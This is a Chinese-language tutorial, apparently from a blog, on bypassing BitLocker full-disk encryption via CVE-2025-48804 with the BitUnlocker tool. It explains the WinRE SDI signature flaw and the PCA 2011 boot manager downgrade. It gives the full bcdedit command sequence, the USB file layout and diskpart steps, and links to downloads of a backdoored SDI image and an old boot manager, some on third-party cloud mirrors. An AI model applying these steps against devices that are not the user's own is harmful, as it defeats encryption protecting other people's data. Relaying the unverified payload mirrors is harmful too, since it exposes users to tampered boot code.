BitLocker 是 Windows 内置的全盘加密工具,其 48 位恢复密钥是解锁加密磁盘的钥匙。微软官方明确表示无法提供或重建丢失的恢复密钥。
BitLocker 密钥两种方式保存,分为微软账户在线备份和本地物理备份(手动保存的情况)。
微软账户在线备份查找恢复密钥地址 https://account.microsoft.com/devices/recoverykey
在首次使用微软账户登录时,会自动开启设备加密并将恢复密钥上传至微软账户,如果没有微软账户和本地都没有备份,可以尝试使用以下的方法。
BitUnlocker 是 GitHub 上的开源项目,它可利用编号 CVE-2025-48804 漏洞对进行对 BitLocker 加密的设备解锁。
BitUnlocker 利用 Windows 恢复环境(WinRE)的 SDI 文件加载机制。SDI 是一种用于存放启动镜像的容器格式,在启动恢复流程时,Windows 启动管理器会校验 SDI 内部 第一个 WIM 镜像的签名合法性,但对于存储在内置 blob 表中的 第二个 镜像,校验机制缺失。只需将一个修改过的 WinRE 镜像(启动后直接弹出 cmd.exe )替换到 SDI 文件的 blob 区,系统在挂载 BitLocker 卷之后,就会无感知地启动这个被植入的后门环境。
此时 TPM 芯片的 PCR 测量值(PCR 7 和 PCR 11)完全正常,卷主密钥(VMK)被静默释放, 整个解密过程没有暴力破解,也没有凭据窃取 。
更深层的问题在于 Secure Boot 的验证逻辑 :它验证的是签名的来源是否可信(即证书链是否被信任),而非二进制文件的版本是否最新。这意味着那些已被修补功能漏洞、但仍使用微软旧根证书 PCA 2011 签名的旧版 bootmgfw.efi ,在未显式吊销该证书的设备上,签名依然被判定为合法。简单来说,就是小区“门禁卡”换新的,旧的“门禁卡”任可以使用。
在目标电脑开机或重启时,按住 Shift 键点击 电源 → 重启 ,系统会进入高级启动选项菜单。依次选择 疑难解答 → 高级选项 → 命令提示符 。
过程中系统可能会弹出“需要输入 BitLocker 恢复密钥才能继续”的对话框,直接点“跳过此驱动器” 即可进入命令提示符。如果提示“无法在锁定的设备上运行 cmd”,也只需点击 “重新启动” 重试一次即可。若始终无法进入,可以自己准备一个 WinPE 启动盘代替。
插入一个空白 U 盘,记下它被分配的盘符,假设为 E: 。
在命令提示符中,插入 U 盘后依次执行以下命令,导出现有启动配置,然后让 Windows 恢复环境在启动时加载 U 盘里的 SDI 镜像:
E:
bcdedit /export BCD_modded
bcdedit /store BCD_modded /set {default} path \WINDOWS\system32\winload_DOESNOTEXIST.efi
bcdedit /store BCD_modded /enum all执行 enum all 后,在输出信息中找到 “Windows Recovery” 对应的那个条目,记录下它后面那串 {GUID} (形如 {1d2n3p4u-...} )。然后继续:
bcdedit /store BCD_modded /set {GUID} ramdisksdidevice boot
bcdedit /store BCD_modded /set {GUID} ramdisksdipath \sdi\boot_patched.sdi
move BCD_modded BCD将生成的BCD文件放在U盘/EFI/Microsoft/Boot/BCD
在另一台电脑进行操作:把以下三个文件按照严格结构放入一个格式化好的 FAT32 U 盘中。
U盘根目录/ EFI/Boot/bootx64.efi # PCA 2011 签名的旧版启动管理器 无法启动重命名为bootmgfw.efi EFI/Microsoft/Boot/BCD # 刚刚修改好的 BCD 文件 sdi/boot_patched.sdi # 注入后门的 SDI 镜像
• bootx64.efi(bootmgfw.efi) :可在任意未打 2025 年 7 月补丁的 Windows 11 镜像中提取,也可以用 BitUnlocker 项目提供的版本。
• boot_patched.sdi :约 300 MB,可直接从项目的 GitHub Releases 页面下载。
• BCD :即上一步在 WinRE 中修改后保存的文件,务必放入对应位置。
无法访问 GitHub 的用户,DNPU 对 bootx64.efi 和 boot_patched.sdi 已打包,可直接下载使用。
https://cloud.189.cn/web/share?code=rUzAryBVfI3i(访问码:ygo1)
https://yun.139.com/shareweb/#/w/i/2v3EgATR7NDf0 提取码:2utq
把做好的 U 盘插入目标电脑,开机后通过启动菜单(通常是 F12 、 F9 或 Esc )选择从 U 盘 UEFI 启动。如果 U 盘选项不显示,可以在高级启动菜单中使用 “从文件启动” ,手动导航到 EFI\Boot\bootx64.efi 。
等进度条走完,屏幕上弹出一个命令行窗口。输入 diskpart ,然后 list volume ,加密硬盘的分区已经解密并分配好盘符。若盘符没自动出现,只需:
select volume X assign letter=Cexit
BitUnlocker 解锁依赖于两个前提:设备仍然信任 PCA 2011 证书,且 BitLocker 仅使用 TPM 纯硬件保护模式。
以下场景无法解锁:
• 配置了 TPM + PIN 码 :预启动时需要用户输入 PIN,TPM 才会释放 VMK。
• 已迁移至 Windows UEFI CA 2023 证书 :2026 年初之后全新安装的 Windows 11 默认使用 CA 2023 证书签名的 bootmgfw.efi ,旧版 PCA 2011 签名的文件将被安全启动拒绝。
BitUnlocker 项目地址:
https://github.com/garatc/BitUnlocker
经DNPU测试,虚拟机不支持BitLocker加密没成功,实机是新系统,测试也没成功,当前项目为死马当活马医,如碰到没有密钥的情况下可使用此方法进行测试一番。
网友评论